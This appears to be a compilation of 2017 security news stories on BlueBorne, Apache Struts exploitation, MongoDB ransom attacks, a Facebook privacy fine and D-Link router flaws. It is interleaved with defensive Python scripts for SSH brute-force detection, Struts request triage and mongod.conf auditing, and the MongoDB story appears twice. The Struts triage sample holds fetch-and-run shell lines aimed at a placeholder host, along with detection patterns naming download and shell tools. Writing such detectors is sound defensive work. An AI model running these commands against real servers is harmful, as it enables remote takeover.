If they crack your root or admin password they essentially control your server, so please ensure you have protection in place, for example:

Rate Limiting the Login Attempts

Hiding the login page

Using htaccess

Hardware Firewall / IP Tables

Two-factor authentication enabled.
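The failed-logon counts in the report come straight out of the SSH daemon's log. As an added example (not code from Frontline Cyber Security or from the report), the script below parses OpenSSH "Failed password" lines in the syslog layout of /var/log/auth.log, counts attempts per source address and per targeted account, and flags a source as brute-forcing when it produces a chosen number of failures inside a sliding time window, which is the same decision a rate limiter such as the ones the report recommends has to make. The log lines are constructed for the example and use RFC 5737 documentation addresses; the hostname `honeypot` and the 2017 year assumed for the year-less syslog timestamps are likewise assumptions.

```python
"""Count and flag failed SSH logins per source IP from auth.log-style lines.

Added illustration; the sample lines below are constructed, not taken from the
report, and use RFC 5737 documentation addresses.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed OpenSSH log excerpt in the syslog format written to /var/log/auth.log.
SAMPLE_AUTH_LOG = """\
Aug 21 00:00:01 honeypot sshd[1201]: Failed password for root from 203.0.113.10 port 51022 ssh2
Aug 21 00:00:03 honeypot sshd[1203]: Failed password for root from 203.0.113.10 port 51030 ssh2
Aug 21 00:00:04 honeypot sshd[1205]: Failed password for invalid user admin from 203.0.113.10 port 51041 ssh2
Aug 21 00:00:09 honeypot sshd[1207]: Failed password for root from 198.51.100.7 port 40010 ssh2
Aug 21 00:00:12 honeypot sshd[1209]: Failed password for root from 203.0.113.10 port 51055 ssh2
Aug 21 00:00:15 honeypot sshd[1211]: Accepted publickey for deploy from 192.0.2.44 port 2200 ssh2
Aug 21 00:00:20 honeypot sshd[1213]: Failed password for invalid user oracle from 203.0.113.10 port 51070 ssh2
"""

# "invalid user" is inserted by sshd when the account does not exist on the host.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

LOG_YEAR = 2017  # assumption: syslog timestamps carry no year


def parse_failed_logins(log_text):
    """Return a list of (timestamp, user, ip) tuples, one per failed password attempt."""
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{LOG_YEAR} {m.group('ts')}", "%Y %b %d %H:%M:%S")
            events.append((ts, m.group("user"), m.group("ip")))
    return events


def attempts_per_ip(events):
    """Failed attempts by source address (the report's 'attack origins' view)."""
    return Counter(ip for _, _, ip in events)


def targeted_accounts(events):
    """Which account names the attackers are guessing against."""
    return Counter(user for _, user, _ in events)


def brute_force_sources(events, threshold=5, window_seconds=60):
    """Sources with at least `threshold` failures inside any `window_seconds` span.

    Sliding window over the sorted timestamps of each IP; returns {ip: count_when_flagged}.
    """
    by_ip = defaultdict(list)
    for ts, _, ip in events:
        by_ip[ip].append(ts)
    flagged = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # shrink the window from the left until it spans at most window_seconds
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = end - start + 1
                break
    return flagged


if __name__ == "__main__":
    evs = parse_failed_logins(SAMPLE_AUTH_LOG)
    print("failed attempts by source:", dict(attempts_per_ip(evs)))
    print("accounts targeted:", dict(targeted_accounts(evs)))
    print("brute-force sources (5 failures / 60 s):", brute_force_sources(evs))
```

The threshold and window are the same two knobs a tool like fail2ban exposes; running the function over real logs with several settings is a quick way to pick values that catch the determined source in the report without locking out a user who mistypes a password twice.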


Billions of Devices Potentially Exposed to New Bluetooth Attack

12.9.2017 securityweek Vulnerebility
Billions of Android, iOS, Windows and Linux devices that use Bluetooth may be exposed to a new attack that can be carried out remotely without any user interaction, researchers warned.

Armis Labs, a company that specializes in protecting Internet of Things (IoT) devices, has discovered a total of eight Bluetooth implementation vulnerabilities that expose mobile, desktop and IoT systems to an attack it has dubbed “BlueBorne.”

According to the security firm, the attack only requires Bluetooth to be enabled on the targeted device – no pairing is needed between the victim and the attacker’s device, and the Bluetooth connection does not even have to be discoverable.

A hacker who is in range of the targeted device can exploit one of the several Bluetooth implementation vulnerabilities that can lead to remote code execution, information disclosure or man-in-the-middle (MitM) attacks. The attacker only needs to determine what type of operating system the target is using in order to deploy an exploit specific to that platform.

BlueBorne does not require the targeted user to click on a link or open a file, and the malicious activities can take place in the background, making it less likely for the victim to notice anything suspicious. And since the attack leverages Bluetooth, a less common attack vector, many security solutions may not detect the malicious activity, Armis said.

The flaws can be exploited by malicious actors to deliver ransomware and other types of malware. Armis claims the technique can also be used to create a worm that spreads from one device to another via Bluetooth.

Armis showed that an attacker can also exploit one BlueBorne vulnerability to launch MitM attacks against Windows machines and redirect the victim’s browsing session to a phishing website. Another video shows a hacker taking control of a Samsung smartwatch running a Linux-based Tizen operating system and eavesdropping on its owner.

Vulnerabilities that allow BlueBorne attacks have been found in several implementations of Bluetooth, including in Windows, Android, Linux and iOS. Experts discovered information disclosure and code execution flaws in Linux; one vulnerability that allows MitM attacks in Windows (CVE-2017-8628); four code execution, MitM and information disclosure vulnerabilities in Android (CVE-2017-0781, CVE-2017-0782, CVE-2017-0783 and CVE-2017-0785); and one code execution flaw in the Bluetooth Low Energy Audio protocol used by iOS.

Google patched the weaknesses in Android with its September security updates and Microsoft is expected to release fixes for Windows on Tuesday. Apple has already addressed the vulnerabilities with the release of iOS 10 (one year ago) and Apple TV 7.2.2. Earlier versions of the Apple operating systems are still vulnerable to attacks.

The developers of Linux distributions have also been notified and are also said to be working on patches.

Armis has released some technical details about each of the vulnerabilities, but it will only make the exploits available at a later date.


Apache Struts Flaw Increasingly Exploited to Hack Servers

12.9.2017 securityweek Vulnerebility
Security firm Imperva has detected thousands of attacks attempting to exploit a recently patched remote code execution vulnerability affecting the Apache Struts 2 open source development framework.

The security hole, tracked as CVE-2017-9805, affects applications that use the REST plugin with the XStream handler for XML payloads, and it exists due to the way Struts deserializes untrusted data. An exploit was made available within hours after a patch was released.

A few days later, Cisco Talos and Belgium-based NVISO Labs reported seeing exploitation attempts in the wild. However, a majority of the attacks only aimed to find vulnerable servers.

Imperva’s systems have blocked thousands of attacks, and the company says roughly 80% of them attempted to deliver a malicious payload, rather than just trying to determine if a server is vulnerable.

Roughly two-thirds of the attacks seen by the company involved Wget, a utility designed for downloading files. The list of payloads also included the /bin/sh system shell, the dig network administration tool, the cURL data transfer tool, and the certificate services program Certutil.

The biggest attack source was China, with a single Chinese IP sending out more than 40% of all the requests. The IP address in question is registered to a Chinese e-commerce company and experts believe the attackers may have compromised one of its devices. Attacks also came from Australia, the United States, Brazil, Canada, Russia and various European countries.

In many cases, cybercriminals executed commands to retrieve a malicious payload that would allow them to take control of the targeted server and abuse it for distributed denial-of-service (DDoS) and other attacks.
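Both write-ups of CVE-2017-9805 on this page (the Cisco advisory summary above and Imperva's figures here) describe the same triage a defender has to do over blocked traffic: which requests to the REST plugin's XML handler merely test for the flaw, which carry a fetch-and-run payload, and how concentrated the sources are. The script below is an added example, not Imperva's or Talos's detection logic, that performs that classification over constructed request records of the kind a WAF or reverse proxy logs. All addresses are RFC 5737 documentation ranges, the path `/app/orders/3` is hypothetical, and the XML bodies are deliberately not working exploit data; only the command strings inside them, which match the tools Imperva lists, matter to the classifier.

```python
"""Triage of blocked requests aimed at the Struts 2 REST plugin's XML handler.

Added illustration, not Imperva's or Cisco Talos's detection logic. All records are
constructed (RFC 5737 addresses, hypothetical path); the XML bodies are placeholders,
not exploit data. The Struts REST plugin picks its handler from Content-Type, which
is why an XML body POSTed to a REST resource is the first thing to look at.
"""
import re
from collections import Counter

SAMPLE_REQUESTS = [
    {"ip": "203.0.113.5", "method": "POST", "path": "/app/orders/3", "content_type": "application/xml",
     "body": "<map><entry><string>wget http://198.51.100.20/x.sh -O /tmp/x.sh</string></entry></map>"},
    {"ip": "203.0.113.5", "method": "POST", "path": "/app/orders/3", "content_type": "application/xml",
     "body": "<map><entry><string>curl -s http://198.51.100.20/x.sh | /bin/sh</string></entry></map>"},
    {"ip": "203.0.113.5", "method": "POST", "path": "/app/orders/3", "content_type": "application/xml",
     "body": "<map><entry><string>/bin/sh -c 'echo ready'</string></entry></map>"},
    {"ip": "198.51.100.77", "method": "POST", "path": "/app/orders/3", "content_type": "application/xml",
     "body": "<map><entry><string>dig probe-9805.198.51.100.77.example</string></entry></map>"},
    {"ip": "198.51.100.77", "method": "POST", "path": "/app/orders/3", "content_type": "text/xml",
     "body": "<map><entry><string>whoami</string></entry></map>"},
    {"ip": "192.0.2.9", "method": "POST", "path": "/app/orders/3", "content_type": "application/json",
     "body": '{"clientName": "Acme", "amount": 10}'},
    {"ip": "192.0.2.9", "method": "GET", "path": "/app/orders/3", "content_type": "", "body": ""},
]

# Tools Imperva reported seeing in payloads; checked in this order, so a
# "curl ... | /bin/sh" body is attributed to the download tool, not the shell.
TOOL_PATTERNS = [
    ("wget", re.compile(r"\bwget\b")),
    ("curl", re.compile(r"\bcurl\b")),
    ("certutil", re.compile(r"\bcertutil\b", re.IGNORECASE)),
    ("dig", re.compile(r"\bdig\b")),
    ("sh", re.compile(r"/bin/(?:ba)?sh\b")),
]


def classify(req):
    """Return 'benign', 'xml-probe', or 'payload:<tool>' for one request record."""
    if req["method"] != "POST" or "xml" not in req["content_type"].lower():
        return "benign"
    for name, pattern in TOOL_PATTERNS:
        if pattern.search(req["body"]):
            return f"payload:{name}"
    return "xml-probe"  # XML body with no fetch/shell tool: most likely a vulnerability check


def summarize(requests):
    """Aggregate the classes, the payload share and the most active source."""
    classes = Counter(classify(r) for r in requests)
    attacks = [r for r in requests if classify(r) != "benign"]
    sources = Counter(r["ip"] for r in attacks)
    top_ip, top_count = sources.most_common(1)[0] if sources else ("", 0)
    n = max(len(attacks), 1)
    return {
        "classes": classes,
        "attack_count": len(attacks),
        "payload_share": sum(v for k, v in classes.items() if k.startswith("payload:")) / n,
        "top_source": top_ip,
        "top_source_share": top_count / n,
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_REQUESTS).items():
        print(f"{key}: {value}")
```

The sample is sized so the two ratios come out at 0.8 and 0.6, mirroring the "roughly 80% carried a payload" and "one address sent over 40%" observations; on real traffic the interesting output is the `top_source` line, because a single address dominating the count is what justifies blocking or rate-limiting that source while the patch is being rolled out.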

Cisco checking products for Apache Struts vulnerability

Several vulnerabilities have been patched in Apache Struts 2 this month and Cisco has started checking its products in order to determine which of them may be exposed to attacks.

While there are some products still under investigation, CVE-2017-9805 has so far been found to impact the company’s MXE 3500 Series Media Experience Engines, Unified Contact Center Enterprise, Unified Intelligent Contact Management Enterprise, and Network Performance Analysis.

A less severe remote code execution flaw patched in Apache Struts 2 last week, CVE-2017-12611, has been found to affect Cisco Digital Media Manager, Hosted Collaboration Solution for Contact Center, Unified Contact Center Enterprise, and Unified Intelligent Contact Management Enterprise.

Apache Struts flaw blamed for Equifax breach

According to some reports, the recent Equifax breach, which affects roughly 143 million consumers in the United States, involved an Apache Struts vulnerability.

While some have jumped to conclude that the flaw in question could be CVE-2017-9805, a more likely scenario is that attackers leveraged CVE-2017-5638, a vulnerability exploited in the wild since March. Equifax has yet to confirm that a Struts flaw was in fact used in the operation targeting its systems.


MongoDB Tightens Security Amid New Database Attacks

12.9.2017 securityweek Attack
A new series of ransomware attacks targeting MongoDB databases has prompted the company to implement new data security measures.

The new attacks follow a similar pattern to the MongoDB ransack campaign unleashed at the end of 2016 and beginning of 2017, when more than 33,000 MongoDB databases were hit within weeks. By mid-January, attackers began targeting Hadoop and CouchDB databases, though the campaign didn’t claim as many victims.

Cybercriminals were targeting poorly secured databases that were exposed to the Internet and allowed them to log in and wipe them clean, leaving ransom notes behind. Attackers claimed to have copied the content of the databases before wiping them, but researchers such as Victor Gevers, chairman of the GDI Foundation, discovered that the attackers didn’t exfiltrate data, but simply erased it.

Three new hacking groups started hitting the MongoDB databases by the end of summer. By September 2, after less than a week of activity, the groups ransacked a total of over 26,000 databases. One group alone claimed over 22,000 of the attacks.

The new incidents, however, don’t represent a new risk, but merely show that hackers have found new targets, MongoDB says. Hackers are targeting misconfigured and unmaintained MongoDB deployments, just as before.

If left exposed to the Internet and without the proper security in place, these databases are bound to fall. Some were left connected to the Internet with no password to the admin account, MongoDB notes in a blog post.

To reduce the chance that databases are deployed insecurely, MongoDB has decided to make new changes in upcoming releases. The database software maker has already made localhost binding the default configuration (in most popular deployment package formats, RPM and deb) since version 2.6.0, meaning that all networked connections need to be explicitly configured by an administrator.

“Beginning with development release version 3.5.7, localhost-only binding is implemented directly in the MongoDB server, making it the default behavior for all distributions. This will also be incorporated into our upcoming production-ready 3.6 release,” the company says.

Victor Gevers, who has been long advocating for the inclusion of additional security features in MongoDB, has confirmed to SecurityWeek that version 3.6 will include “long awaited improvement for security which prevent unsafe default deployments.”

He also revealed that, in the new attacks, some of the databases have been hit multiple times after their admins restored the data but didn’t fix the actual problem. According to him, however, only deployments that are discoverable via open source intelligence are being targeted.

“There are attacks going on at a small scale against the machines that were already hit. New MongoDB instances which are not indexed by the famous search engine Shodan are not being hit. This means some groups don't scan themselves but simply use OSINT,” Gevers said.

There have been nearly 76,000 such attacks registered to date, as per a Google Docs spreadsheet maintained by Gevers, Niall Merrigan, and others. The researchers have been working hard helping victims, but they usually do voluntary work: “But don't forget we are doing this work as volunteers. We are expected to be the last resort and failure is not an option,” Gevers said.

During the first series of attacks in early January, the researchers helped 126 victims, including organizations that represented the “most horrifying data losses I have seen in my entire career,” Gevers said. One incident, he pointed out, involved the leak of data pertaining to hundreds of thousands of patients.

The issue, the researcher argues, is that many organizations aren’t even aware of the fact that they have been breached: “Awareness is an issue which needs to be addressed over and over again. I think the GDPR is going to help with that,” he said.

“Most people have no clue what they are doing. We see across all great (open source) products. From CouchDB, Redis, ElasticSearch, Hadoop HDFS, Jenkins, etc, etc. DevOPS have increased the amount of this kind of data leaks significantly in the last 5/6 years,” Gevers also said.


MongoDB improves security amid new wave of ransom-attacks
12.9.2017 securityaffairs Ransomware

MongoDB company implements new data security features in response to the recent wave of ransom attacks that hit installations worldwide.
You have to admit that the bad actors are very good at leveraging a vulnerability into a lucrative opportunity. The latest example comes from MongoDB, a popular, open source database commonly deployed for big data applications on the Internet.

The default installation for older versions of MongoDB did not force basic security controls such as a password for the administration account. Installed behind firewalls in a “traditional” data center configuration, the default installation is bad practice, but not necessarily a significant risk. Layers of protection mitigate the missing controls.

Unfortunately, many cloud hosting providers allow easy installation of MongoDB making it directly accessible from the Internet by default without a simple way to setup the security controls. Strip away layered security controls and do not force basic configuration security and you have a recipe for disaster.

“The most open and vulnerable MongoDBs can be found on the AWS platform because this is the most favorite place for organizations who want to work in a devops way,” Victor Gevers told Bleeping Computer. “About 78 percent of all these hosts were running known vulnerable versions.”

In December 2016, one bad actor started compromising vulnerable MongoDB databases. Contents were downloaded and replaced by a ransom note demanding payment in exchange for a return of the missing data. By January, many hacking groups were involved and over 20,000 vulnerable MongoDB installations were compromised. With that many groups in competition, databases were compromised multiple times and ransom notes from one group were replaced by ransom notes from another group. It was unclear for victims who had their missing data and who the ransom should be paid to. Victims paying the ransom were unlikely to get their data back.

After this flurry of activity in the first few months of 2016, the number of MongoDB attacks quieted over the Summer. Perhaps the victims had learned their lessons? Maybe they accepted their fate and couldn’t be ransomed again? Maybe the bad actors were taking the Summer off to spend their ill-gotten gains? What we do know is that there are still thousands of vulnerable databases. Attacks against MongoDB databases picked up again in September — at a much faster pace. “[it] took attackers from the first wave of MongoDB attacks nearly a month to rack up 45,000 ransomed DBs. The Cru3lty group managed [22,000] only last week.”


Obviously, the bad actors have figured out how to script the attacks, but how do they find the targets? The same way most vulnerable systems are found on the Internet, SHODAN. The self-described “search engine for Internet-connected devices” is an easy place to find Internet of Things (IoT) devices. A great place to identify vulnerable web cams, refrigerators, industrial control systems (ICS), web apps and databases. If it is connected to the Internet you can find it in SHODAN. Once you know how to identify vulnerable MongoDB installations, add some scripting magic, exploit, ransom and repeat.

“New MongoDB instances which are not indexed by the famous search engine Shodan are not being hit. This means some groups don’t scan themselves but simply use OSINT,” said Victor Gevers, chairman of the GDI Foundation and one of the lead researchers tracking the ongoing attacks.

With all of the media coverage and the number of people affected at the beginning of the year, you might expect that everyone has checked and protected their MongoDB installations. But that is obviously not the case. According to a Google Docs spreadsheet maintained by the researchers, the count of compromised databases is almost 76,000. Obviously, the people installing MongoDB aren’t putting in the effort to secure their installations so the MongoDB team is changing their default installs to be more secure. If you are responsible for an existing MongoDB installation, you should check out the official MongoDB Security Checklist to ensure you are protected.
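Both MongoDB stories on this page come down to two settings in mongod.conf: which interfaces the server listens on (`net.bindIp`, the localhost-only default MongoDB is now enforcing server-side from 3.6) and whether connecting clients must authenticate (`security.authorization`). The following is an added example, not code from MongoDB or from the researchers quoted, that shows a constructed configuration of the exposed kind beside a hardened one and audits both for exactly those two items. The parser handles only the flat two-level layout mongod.conf uses; treating that as sufficient, rather than pulling in a full YAML library, is an assumption made to keep the example self-contained.

```python
"""Audit a mongod.conf for the two settings behind the ransom attacks.

Added illustration, not code from MongoDB or from the researchers quoted. Both
configurations below are constructed. The parser understands only the
'section:\\n  key: value' layout of mongod.conf (assumption: no lists, no nesting
deeper than two levels), which is all this check needs.
"""

# Constructed: the shape of deployment the ransom groups found via Shodan.
EXPOSED_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 0.0.0.0   # every interface, including the cloud host's public address
"""

# Constructed: the bindIp and authorization items of the MongoDB Security Checklist applied.
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 127.0.0.1   # application servers reach it over a private network or tunnel
security:
  authorization: enabled   # enable only after an administrative user has been created
"""


def parse_mongod_conf(text):
    """Return {section: {key: value}} for the two-level layout; comments are stripped."""
    config, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, _, value = line.strip().partition(":")
        if indent == 0:
            section = key.strip()
            config.setdefault(section, {})
        elif section is not None:
            config[section][key.strip()] = value.strip()
    return config


def audit_mongod_conf(text):
    """List the findings a reviewer would raise; an empty list means both checks pass."""
    cfg = parse_mongod_conf(text)
    findings = []

    bind_ip = cfg.get("net", {}).get("bindIp", "")
    if not bind_ip:
        findings.append(
            "net.bindIp not set: before the 3.6 server-side default, a mongod started "
            "outside the RPM/deb packages listens on every interface"
        )
    elif any(addr.strip() in ("0.0.0.0", "::") for addr in bind_ip.split(",")):
        findings.append(f"net.bindIp={bind_ip}: reachable from the Internet if the host is")

    if cfg.get("security", {}).get("authorization", "").lower() != "enabled":
        findings.append("security.authorization not enabled: anyone who can connect has full access")

    return findings


if __name__ == "__main__":
    for label, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {audit_mongod_conf(conf) or 'no findings'}")
```

Either finding on its own is survivable behind a firewall, which is the "layers of protection" point made above; the ransom campaigns worked because cloud images shipped both at once. Note that enabling `authorization` before creating an administrative user locks the operator out as well, so the checklist's ordering matters.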


Spain – Facebook slapped with €1.2M fine for violating data protection regulations
12.9.2017 securityaffairs Privacy

The Spanish Data Protection Agency (AEPD) has issued a €1.2 Million fine against Facebook for violating data protection regulations.
More privacy problems for the tech giant Facebook: the company has been fined for a series of privacy violations in Spain.

According to the AEPD, the social network collects users’ personal data for commercial purposes without informed and ‘unequivocal consent’, and shares it with advertisers and marketers without informing users. The company also collects sensitive data on users’ ideology, religious beliefs, sex, personal tastes and browsing activity.

“The Agency notes that the social network collects, stores and uses data, including specially protected data, for advertising purposes without obtaining consent.

The data on ideology, sex, religious beliefs, personal preferences or browsing activity are collected directly, through interaction with their services or from third party pages without clearly informing the user about how and for what purpose will use those data” states the AEPD.

“Facebook does not obtain unambiguous, specific and informed consent from users to process their data, since the information it offers is not adequate”
The list of violations continues: Facebook does not fully delete information once it is no longer needed for the purpose for which it was collected.

The Spanish agency identified two serious and one very serious infringements of the Data Protection Law and imposed a sanction of 1,200,000 euros on the company.

The AEPD fined Facebook €600,000 for the “very serious” infringement, while the two serious violations are:
Tracking people through the use of “Like” button social plug-ins embedded in other, non-Facebook web pages (€300,000).
Failing to delete data collected from users once it has finished using it (€300,000).
The AEPD also accuses Facebook of using a privacy policy containing “generic and unclear terms” that doesn’t “adequately collect the consent of either its users or nonusers, which constitutes a serious infringement.”

Below is Facebook’s reply to the accusations:
“We take note of the DPA’s decision with which we respectfully disagree. Whilst we value the opportunities we’ve had to engage with the DPA to reinforce how seriously we take the privacy of people who use Facebook, we intend to appeal this decision.”
“As we made clear to the DPA, users choose which information they want to add to their profile and share with others, such as their religion. However, we do not use this information to target adverts to people.” states Facebook.

In May, the company was fined €150,000 by France’s data protection authority CNIL over the techniques it used to target advertising and track users.


MongoDB Tightens Security Amid New Database Attacks

11.9.2017 securityweek Attack
A new series of ransomware attacks targeting MongoDB databases has prompted the company to implement new data security measures.

The new attacks follow a similar pattern to the MongoDB ransack campaign unleashed at the end of 2016 and beginning of 2017, when more than 33,000 MongoDB databases were wiped within weeks. By mid-January, attackers had begun targeting Hadoop and CouchDB databases as well, though that campaign didn’t claim as many victims.

Cybercriminals targeted poorly secured databases that were exposed to the Internet, logged in, wiped them clean and left ransom notes behind. The attackers claimed to have copied the content of the databases before wiping them, but researchers such as Victor Gevers, chairman of the GDI Foundation, found that the attackers didn’t exfiltrate the data, but simply erased it.

Three new hacking groups started hitting the MongoDB databases by the end of summer. By September 2, after less than a week of activity, the groups ransacked a total of over 26,000 databases. One group alone claimed over 22,000 of the attacks.

The new incidents, however, don’t represent a new risk, but merely show that hackers have found new targets, MongoDB says. Hackers are targeting misconfigured and unmaintained MongoDB deployments, just as before.

If left exposed to the Internet and without the proper security in place, these databases are bound to fall. Some were left connected to the Internet with no password to the admin account, MongoDB notes in a blog post.

To reduce the chance that databases are deployed insecurely, MongoDB has decided to make new changes in upcoming releases. The database software maker has already made localhost binding the default configuration (in most popular deployment package formats, RPM and deb) since version 2.6.0, meaning that all networked connections need to be explicitly configured by an administrator.

“Beginning with development release version 3.5.7, localhost-only binding is implemented directly in the MongoDB server, making it the default behavior for all distributions. This will also be incorporated into our upcoming production-ready 3.6 release,” the company says.
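The two settings that decided every one of these campaigns are the bind address and access control, and both live in the mongod.conf that the localhost-binding change above and the MongoDB Security Checklist mentioned earlier are about. The following is an added example (editor's code, not MongoDB's or the researchers'): a small audit of mongod.conf files that flags an all-interfaces bind, a bind that reaches beyond loopback, and disabled authorization, so the instance that Shodan would index is caught before the scanners find it. The three configurations are constructed for the example; the `net.bindIpAll` option it checks is a real option that exists from MongoDB 3.6 onward, and the parser handles only the nested key: value subset of YAML that mongod.conf uses.

```python
import re
from typing import Dict, List

# Constructed sample configurations (not copied from any real deployment).
# EXPOSED_CONF has the shape of the databases that were ransacked: listening on
# every interface with no access control. HARDENED_CONF is the shape the
# MongoDB security checklist asks for.
EXPOSED_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 0.0.0.0
"""

HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 127.0.0.1
security:
  authorization: enabled
"""

# Bound to an internal address: not indexed by Shodan on its own, but only as
# safe as the firewall in front of it, so it is reported for review.
INTERNAL_CONF = """\
net:
  bindIp: 127.0.0.1,10.0.0.5
security:
  authorization: enabled
"""

WILDCARD_BINDS = {"0.0.0.0", "::"}
LOOPBACK_PREFIXES = ("127.", "::1", "localhost")


def parse_mongod_conf(text: str) -> Dict[str, str]:
    """Flatten the YAML subset mongod.conf uses (nested key: value maps) into
    dotted keys, e.g. {"net.bindIp": "0.0.0.0"}. Deliberately tiny: no lists,
    anchors or multi-line scalars, so no YAML library is needed."""
    conf: Dict[str, str] = {}
    stack: List[tuple] = []          # (indent, key) of the enclosing maps
    for raw in text.splitlines():
        line = re.sub(r"(^|\s)#.*$", "", raw).rstrip()   # drop comments
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        key, _, value = line.strip().partition(":")
        while stack and stack[-1][0] >= indent:           # leave deeper maps
            stack.pop()
        stack.append((indent, key.strip()))
        value = value.strip().strip("\"'")
        if value:
            conf[".".join(k for _, k in stack)] = value
    return conf


def audit_mongod_conf(text: str) -> List[str]:
    """Return one finding per insecure setting; an empty list means the two
    checklist items that decided the ransom campaigns are both satisfied."""
    conf = parse_mongod_conf(text)
    findings: List[str] = []

    if conf.get("net.bindIpAll", "").lower() == "true":
        findings.append("net.bindIpAll is true: mongod listens on every interface")
    elif "net.bindIp" not in conf:
        findings.append("net.bindIp not set: pre-3.6 server binaries bind every "
                        "interface unless the package config overrides it")
    else:
        addrs = [a.strip() for a in conf["net.bindIp"].split(",")]
        wildcard = [a for a in addrs if a in WILDCARD_BINDS]
        non_loopback = [a for a in addrs
                        if a not in WILDCARD_BINDS and not a.startswith(LOOPBACK_PREFIXES)]
        if wildcard:
            findings.append(f"net.bindIp listens on every interface: {', '.join(wildcard)}")
        if non_loopback:
            findings.append("net.bindIp reaches beyond loopback (firewall it): "
                            + ", ".join(non_loopback))

    if conf.get("security.authorization", "disabled").lower() != "enabled":
        findings.append("security.authorization is not enabled: anyone who can "
                        "reach the port can drop every database")
    return findings


if __name__ == "__main__":
    for name, text in (("exposed", EXPOSED_CONF), ("internal", INTERNAL_CONF),
                       ("hardened", HARDENED_CONF)):
        print(name, audit_mongod_conf(text) or ["OK"])
```

Run it against `/etc/mongod.conf` on each host; a clean result still has to be paired with the checklist's remaining items (TLS, role-based users, a tested restore), because an empty findings list only says the database is not reachable by anonymous strangers on the Internet.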

Victor Gevers, who has been long advocating for the inclusion of additional security features in MongoDB, has confirmed to SecurityWeek that version 3.6 will include “long awaited improvement for security which prevent unsafe default deployments.”

He also revealed that, in the new attacks, some of the databases have been hit multiple times after their admins restored the data but didn’t fix the actual problem. According to him, however, only deployments that are discoverable via open source intelligence are being targeted.

“There are attacks going on at a small scale against the machines that were already hit. New MongoDB instances which are not indexed by the famous search engine Shodan are not being hit. This means some groups don't scan themselves but simply use OSINT,” Gevers said.

There have been nearly 76,000 such attacks registered to date, according to a Google Docs spreadsheet maintained by Gevers, Niall Merrigan, and others. The researchers have been working hard helping victims, but they do so as volunteers: “But don't forget we are doing this work as volunteers. We are expected to be the last resort and failure is not an option,” Gevers said.

During the first series of attacks in early January, the researchers helped 126 victims, including organizations that represented the “most horrifying data losses I have seen in my entire career,” Gevers said. One incident, he pointed out, involved the leak of data pertaining to hundreds of thousands of patients.

The issue, the researcher argues, is that many organizations aren’t even aware of the fact that they have been breached: “Awareness is an issue which needs to be addressed over and over again. I think the GDPR is going to help with that,” he said.

“Most people have no clue what they are doing. We see it across all great (open source) products. From CouchDB, Redis, ElasticSearch, Hadoop HDFS, Jenkins, etc, etc. DevOPS have increased the amount of this kind of data leaks significantly in the last 5/6 years,” Gevers also said.


Expert disclosed 10 zero-day vulnerabilities in D-Link DIR 850L wireless routers
11.9.2017 securityaffairs Vulnerebility

The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in D-Link DIR 850L routers and invites users to stop using them.
The flawed devices, from the Taiwan-based networking equipment manufacturer D-Link, are the DIR 850L wireless AC1200 dual-band gigabit cloud routers; the vulnerabilities include a lack of proper firmware protection, backdoor access, command injection resulting in root access and several cross-site scripting (XSS) flaws.

An attacker could exploit the vulnerabilities to intercept traffic, upload malicious firmware, and get full control over the affected routers.

Kim maintains that “the D-Link DIR 850L is a router overall badly designed with a lot of vulnerabilities. Basically, everything was pwned, from the LAN to the WAN. Even the custom MyDlink cloud protocol was abused,” he wrote in a blog post.

This isn’t the first time Kim has spotted flaws in D-Link products: in October 2016 he reported multiple vulnerabilities in the D-Link DWR-932B LTE router, but the Taiwan-based firm ignored them.

For this reason, the researcher decided this time to publicly disclose the zero-day vulnerabilities, hoping that the company will fix them.
In the meantime, users are advised to avoid using the affected D-Link router in order to be safe from such attacks.
“I advise to IMMEDIATELY DISCONNECT vulnerable routers from the Internet.” Kim wrote.


Below is the list of zero-day vulnerabilities disclosed by Kim that affect the D-Link DIR 850L revision A and revision B:
Lack of proper firmware protection—the firmware images are not protected, so an attacker could upload a malicious firmware version to the device and compromise it. While the firmware for the D-Link 850L RevA has no protection at all, the firmware for the RevB is protected only with a hardcoded password.
Cross-site scripting (XSS) flaws—both the LAN and WAN interfaces of the D-Link 850L RevA are vulnerable to “several trivial” XSS vulnerabilities, allowing an attacker “to use the XSS to target an authenticated user in order to steal the authentication cookies.”
Retrieve admin passwords—both the LAN and WAN interfaces of the D-Link 850L RevB are vulnerable; an attacker can retrieve the admin password and use the MyDLink cloud protocol to add the user’s router to the attacker’s account to gain full access to the device.
Weak cloud protocol—both the D-Link 850L RevA and RevB are vulnerable. The MyDLink protocol works via a TCP tunnel that uses no encryption at all to protect communications between the victim’s router and the MyDLink account.
Backdoor access—D-Link 850L RevB routers have backdoor access via Alphanetworks; an attacker can get a root shell on the device.
Private keys hardcoded in the firmware—the private encryption keys are hardcoded in the firmware of both the D-Link 850L RevA and RevB. An attacker could extract them to perform man-in-the-middle attacks.
No authentication check—an attacker could alter the DNS settings of a D-Link 850L RevA router via unauthenticated HTTP requests and hijack the traffic.
Weak file permissions and credentials stored in cleartext—local files are exposed on both the D-Link 850L RevA and RevB, and credentials are stored in clear text.
Pre-authentication RCEs as root—the internal DHCP client running on D-Link 850L RevB routers is vulnerable to several command injection attacks, allowing attackers to gain root access on the affected devices.
Denial of service (DoS) flaw—an attacker could remotely crash some daemons running on both the D-Link 850L RevA and RevB via the LAN, triggering DoS conditions.
Below is the disclosure timeline:
